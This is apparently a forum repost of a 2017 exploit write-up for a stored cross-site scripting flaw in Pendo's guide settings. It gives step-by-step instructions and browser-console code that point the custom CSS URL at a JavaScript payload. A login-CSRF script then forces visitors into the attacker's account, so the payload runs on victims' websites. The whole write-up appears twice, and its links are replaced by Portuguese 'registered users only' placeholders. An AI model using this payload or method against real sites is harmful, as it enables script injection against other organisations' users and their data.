Hola
Date: 22/3/2017
Vendor homepage: pendo.io
Software Link: pendo.io/register
Version: 1.18.5 and lower
Tested on: Windows, Chrome, Firefox, Internet Explorer
exploit details:
1. Goto Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (Guides Management)
at the top bar, type the Pendo's website to exploit
(for example, Pendo itself: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
* you need to already have an account there (can create for free Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
2. press the "Global Settings", choose "Add Custom CSS" and in the Textarea put some content ("a{color: red}" for example)
3. Before pressing "Save", Open Developer console and paste the following:
var css_scope = angular.element(document.getElementById('css-properties')).scope();
css_scope.editor.css.dirty = false;
css_scope.editor.launcher.config.guideCssUrl = "data:,alert%28%22Context:%20%22+location%29%3 B//"
4 .Make sure to change "data:,alert%28%22Context:%20%22+location%29%3 B//" to your own URL encoded JS payload with comment ("//") in the end.
and then, press the "Save" button. Make sure the string .CSS is not shown
5. anyone who will surf to Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... with your credentials will trigger your payload in the context of the victim's website.
6.
<script>
navigator.sendBeacon("https://app.pendo.io/login", '{"username":"YOUR_PENDO_ACCOUNT_EMAIL_GOES_HERE", "password":"YOUR_PENDO_ACCOUNT_PASSWORD_GOES_HERE" ,"rememberme":true}');
setTimeout(function() {
location.replace('https://app.pendo.io/in-app/guides');
}, 2000);
</script>
Example 1:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Example 2:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Date: 22/3/2017
Vendor homepage: pendo.io
Software Link: pendo.io/register
Version: 1.18.5 and lower
Tested on: Windows, Chrome, Firefox, Internet Explorer
exploit details:
1. Goto Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... (Guides Management)
at the top bar, type the Pendo's website to exploit
(for example, Pendo itself: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
* you need to already have an account there (can create for free Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...)
2. press the "Global Settings", choose "Add Custom CSS" and in the Textarea put some content ("a{color: red}" for example)
3. Before pressing "Save", Open Developer console and paste the following:
var css_scope = angular.element(document.getElementById('css-properties')).scope();
css_scope.editor.css.dirty = false;
css_scope.editor.launcher.config.guideCssUrl = "data:,alert%28%22Context:%20%22+location%29%3 B//"
4 .Make sure to change "data:,alert%28%22Context:%20%22+location%29%3 B//" to your own URL encoded JS payload with comment ("//") in the end.
and then, press the "Save" button. Make sure the string .CSS is not shown
5. anyone who will surf to Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... with your credentials will trigger your payload in the context of the victim's website.
6.
<script>
navigator.sendBeacon("https://app.pendo.io/login", '{"username":"YOUR_PENDO_ACCOUNT_EMAIL_GOES_HERE", "password":"YOUR_PENDO_ACCOUNT_PASSWORD_GOES_HERE" ,"rememberme":true}');
setTimeout(function() {
location.replace('https://app.pendo.io/in-app/guides');
}, 2000);
</script>
Example 1:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Example 2:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...